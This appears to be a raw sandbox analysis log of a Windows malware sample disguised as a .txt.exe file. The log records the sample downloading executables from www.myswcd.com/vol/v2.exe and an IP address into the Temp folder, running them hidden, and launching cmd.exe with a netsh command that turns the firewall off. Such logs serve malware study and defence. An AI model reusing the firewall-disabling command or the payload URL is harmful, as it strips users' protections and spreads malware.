File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 41044 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 41044 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 41044 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 23360 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 23360 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 23360 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 35204 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 35204 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 35204 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 8924 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 8924 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 8924 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 6004 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 6004 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 6004 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 17848 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 17848 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 17848 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1460 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1460 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1460 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1460 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1460 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1460 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61724 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 22064 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 22064 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 22064 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 16060 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 16060 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 16060 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 52724 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 52724 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 52724 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2920 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2920 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 64360 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 49411, size_out = 8924 True 1
Fn
Data
Inet Read Response size = 49411, size_out = 8924 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 8924 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 40487, size_out = 3752 True 1
Fn
Data
Inet Read Response size = 40487, size_out = 3752 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 36735, size_out = 34208 True 1
Fn
Data
Inet Read Response size = 36735, size_out = 34208 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 33864 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 2527, size_out = 2527 True 1
Fn
Data
Inet Read Response size = 2527, size_out = 2527 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 2527 True 1
Fn
Data
Process Create process_name = "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe", os_pid = 0xba4, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, type = file_type True 2
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 54.191.17.130, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 50, size_out = 50 True 1
Fn
Data
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = www.myswcd.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /vol/v2.exe True 1
Fn
Inet Send HTTP Request headers = host: www.myswcd.com, url = www.myswcd.com/vol/v2.exe True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 4664 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 4664 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 4391 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 39584 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 39584 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 39584 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 39481, size_out = 7464 True 1
Fn
Data
Inet Read Response size = 39481, size_out = 7464 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 7464 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 32017, size_out = 32017 True 1
Fn
Data
Inet Read Response size = 32017, size_out = 32017 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, size = 32017 True 1
Fn
Data
Process Create process_name = "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe", os_pid = 0xbf4, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Thread 0xa40
17 6
»
Category Operation Information Success Count Logfile
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Module Unmap process_name = c:\users\eebsym5\desktop\output.113528456.txt.exe True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Module Unmap process_name = c:\users\eebsym5\desktop\output.113528456.txt.exe True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Thread 0xa44
1 0
»
Category Operation Information Success Count Logfile
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process #2: cmd.exe
59 0
»
Information Value
ID #2
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c netsh Advfirewall set allprofiles state off
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:00:43, Reason: Child Process
Unmonitor End Time: 00:01:00, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0xa54
Parent PID 0x9a4 (c:\users\eebsym5\desktop\output.113528456.txt.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A58
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory rw True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory rw True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory rw True False False -
private_0x00000000000b0000 0x000b0000 0x001affff Private Memory rw True False False -
locale.nls 0x001b0000 0x00216fff Memory Mapped File r False False False -
pagefile_0x0000000000220000 0x00220000 0x002e7fff Pagefile Backed Memory r True False False -
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory rw True False False -
pagefile_0x0000000000470000 0x00470000 0x00570fff Pagefile Backed Memory r True False False -
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory rw True False False -
pagefile_0x0000000000620000 0x00620000 0x0121ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001220000 0x01220000 0x01382fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01390000 0x0165efff Memory Mapped File r False False False -
cmd.exe 0x4a960000 0x4a9abfff Memory Mapped File rwx True False False -
winbrand.dll 0x71f40000 0x71f46fff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Threads
Thread 0xa58
59 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:08:46 (UTC) True 1
Fn
System Get Time type = Ticks, time = 106891 True 1
Fn
Module Get Handle module_name = c:\windows\system32\cmd.exe, base_address = 0x4a960000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769624c2 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 192, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\EEBsYm5\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7694ac6c True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76953ea8 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76962732 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\netsh.exe, os_pid = 0xa70, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #3: netsh.exe
77 0
»
Information Value
ID #3
File Name c:\windows\system32\netsh.exe
Command Line netsh Advfirewall set allprofiles state off
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:00:43, Reason: Child Process
Unmonitor End Time: 00:01:00, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0xa70
Parent PID 0xa54 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A74
0x A88
0x A94
0x A98
0x A9C
0x AA0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory rw True False False -
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory r True False False -
locale.nls 0x00150000 0x001b6fff Memory Mapped File r False False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory rw True False False -
netsh.exe.mui 0x001e0000 0x001e4fff Memory Mapped File rw False False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory rw True False False -
private_0x0000000000200000 0x00200000 0x00200fff Private Memory rw True False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory rw True False False -
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory r True False False -
odbcint.dll.mui 0x00230000 0x0023afff Memory Mapped File rw False False False -
pagefile_0x0000000000240000 0x00240000 0x00241fff Pagefile Backed Memory r True False False -
mfc42u.dll.mui 0x00250000 0x00257fff Memory Mapped File rw False False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000270000 0x00270000 0x00271fff Pagefile Backed Memory r True False False -
private_0x0000000000280000 0x00280000 0x0037ffff Private Memory rw True False False -
pagefile_0x0000000000380000 0x00380000 0x00447fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000450000 0x00450000 0x00550fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000560000 0x00560000 0x0115ffff Pagefile Backed Memory r True False False -
private_0x0000000001160000 0x01160000 0x0123ffff Private Memory rw True False False -
private_0x0000000001160000 0x01160000 0x011cffff Private Memory rw True False False -
private_0x0000000001160000 0x01160000 0x01161fff Private Memory rw True False False -
private_0x0000000001190000 0x01190000 0x011cffff Private Memory rw True False False -
private_0x0000000001200000 0x01200000 0x0123ffff Private Memory rw True False False -
private_0x0000000001240000 0x01240000 0x0131ffff Private Memory rw True False False -
private_0x0000000001240000 0x01240000 0x012bffff Private Memory rw True False False -
private_0x00000000012e0000 0x012e0000 0x0131ffff Private Memory rw True False False -
private_0x0000000001320000 0x01320000 0x0138ffff Private Memory rw True False False -
private_0x0000000001390000 0x01390000 0x0148ffff Private Memory rw True False False -
private_0x0000000001490000 0x01490000 0x0159ffff Private Memory rw True False False -
netsh.exe 0x01620000 0x0163afff Memory Mapped File rwx True False False -
private_0x0000000001640000 0x01640000 0x0186ffff Private Memory rw True False False -
private_0x0000000001640000 0x01640000 0x0176ffff Private Memory rw True False False -
private_0x0000000001640000 0x01640000 0x0171ffff Private Memory rw True False False -
private_0x0000000001760000 0x01760000 0x0176ffff Private Memory rw True False False -
private_0x0000000001830000 0x01830000 0x0186ffff Private Memory rw True False False -
sortdefault.nls 0x01870000 0x01b3efff Memory Mapped File r False False False -
pagefile_0x0000000001b40000 0x01b40000 0x01f32fff Pagefile Backed Memory r True False False -
private_0x0000000001f40000 0x01f40000 0x020bffff Private Memory rw True False False -
private_0x0000000001f40000 0x01f40000 0x0209ffff Private Memory rw True False False -
private_0x00000000020b0000 0x020b0000 0x020bffff Private Memory rw True False False -
private_0x0000000002210000 0x02210000 0x0230ffff Private Memory rw True False False -
p2pnetsh.dll 0x6b440000 0x6b464fff Memory Mapped File rwx False False False -
tdh.dll 0x6b470000 0x6b507fff Memory Mapped File rwx False False False -
ndfapi.dll 0x6b510000 0x6b543fff Memory Mapped File rwx False False False -
nettrace.dll 0x6b550000 0x6b5d9fff Memory Mapped File rwx False False False -
polstore.dll 0x6b5e0000 0x6b625fff Memory Mapped File rwx False False False -
adsldpc.dll 0x6b630000 0x6b663fff Memory Mapped File rwx False False False -
activeds.dll 0x6b670000 0x6b6a4fff Memory Mapped File rwx False False False -
nshipsec.dll 0x6b6b0000 0x6b708fff Memory Mapped File rwx False False False -
certcli.dll 0x6b710000 0x6b765fff Memory Mapped File rwx False False False -
napmontr.dll 0x6b770000 0x6b798fff Memory Mapped File rwx False False False -
wcnnetsh.dll 0x6da80000 0x6da89fff Memory Mapped File rwx False False False -
eappprxy.dll 0x6da90000 0x6daa0fff Memory Mapped File rwx False False False -
onex.dll 0x6dab0000 0x6dae3fff Memory Mapped File rwx False False False -
eappcfg.dll 0x6daf0000 0x6db1efff Memory Mapped File rwx False False False -
dot3api.dll 0x6db20000 0x6db39fff Memory Mapped File rwx False False False -
dot3cfg.dll 0x6db40000 0x6db56fff Memory Mapped File rwx False False False -
rpcnsh.dll 0x6db60000 0x6db6afff Memory Mapped File rwx False False False -
hnetmon.dll 0x6db70000 0x6db76fff Memory Mapped File rwx False False False -
netiohlp.dll 0x6db80000 0x6dbabfff Memory Mapped File rwx False False False -
authfwcfg.dll 0x6dbb0000 0x6dc03fff Memory Mapped File rwx False False False -
mfc42u.dll 0x6dc10000 0x6dd2efff Memory Mapped File rwx False False False -
whhelper.dll 0x6dd30000 0x6dd36fff Memory Mapped File rwx False False False -
fwcfg.dll 0x6dd40000 0x6dd50fff Memory Mapped File rwx False False False -
nshwfp.dll 0x6dd60000 0x6de03fff Memory Mapped File rwx False False False -
odbcint.dll 0x6de10000 0x6de47fff Memory Mapped File rwx False False False -
credui.dll 0x6de50000 0x6de7afff Memory Mapped File rwx False False False -
winipsec.dll 0x6e160000 0x6e173fff Memory Mapped File rwx False False False -
dhcpqec.dll 0x6e440000 0x6e456fff Memory Mapped File rwx False False False -
odbc32.dll 0x6e460000 0x6e4ebfff Memory Mapped File rwx False False False -
httpapi.dll 0x6e820000 0x6e82afff Memory Mapped File rwx False False False -
ifmon.dll 0x6ee80000 0x6ee88fff Memory Mapped File rwx False False False -
nshhttp.dll 0x6ee90000 0x6ee99fff Memory Mapped File rwx False False False -
nci.dll 0x6eed0000 0x6eee5fff Memory Mapped File rwx False False False -
rasmontr.dll 0x6f8d0000 0x6f8fdfff Memory Mapped File rwx False False False -
webio.dll 0x6fcf0000 0x6fd3efff Memory Mapped File rwx False False False -
winhttp.dll 0x6fd40000 0x6fd97fff Memory Mapped File rwx False False False -
wdi.dll 0x6fff0000 0x70004fff Memory Mapped File rwx False False False -
mpr.dll 0x71d30000 0x71d41fff Memory Mapped File rwx False False False -
ws2help.dll 0x71f20000 0x71f22fff Memory Mapped File rwx False False False -
dhcpcmonitor.dll 0x71f30000 0x71f35fff Memory Mapped File rwx False False False -
wshelper.dll 0x71f50000 0x71f56fff Memory Mapped File rwx False False False -
wlanutil.dll 0x72560000 0x72565fff Memory Mapped File rwx False False False -
wlanapi.dll 0x72570000 0x72585fff Memory Mapped File rwx False False False -
rasman.dll 0x725f0000 0x72604fff Memory Mapped File rwx False False False -
rasapi32.dll 0x72610000 0x72661fff Memory Mapped File rwx False False False -
mprapi.dll 0x72670000 0x72698fff Memory Mapped File rwx False False False -
qutil.dll 0x727c0000 0x727d6fff Memory Mapped File rwx False False False -
netshell.dll 0x729e0000 0x72c44fff Memory Mapped File rwx False False False -
dhcpcsvc.dll 0x73670000 0x73681fff Memory Mapped File rwx False False False -
dhcpcsvc6.dll 0x73690000 0x7369cfff Memory Mapped File rwx False False False -
fwpuclnt.dll 0x736b0000 0x736e7fff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
slc.dll 0x73870000 0x73879fff Memory Mapped File rwx False False False -
atl.dll 0x738a0000 0x738b3fff Memory Mapped File rwx False False False -
nlaapi.dll 0x738f0000 0x738fffff Memory Mapped File rwx False False False -
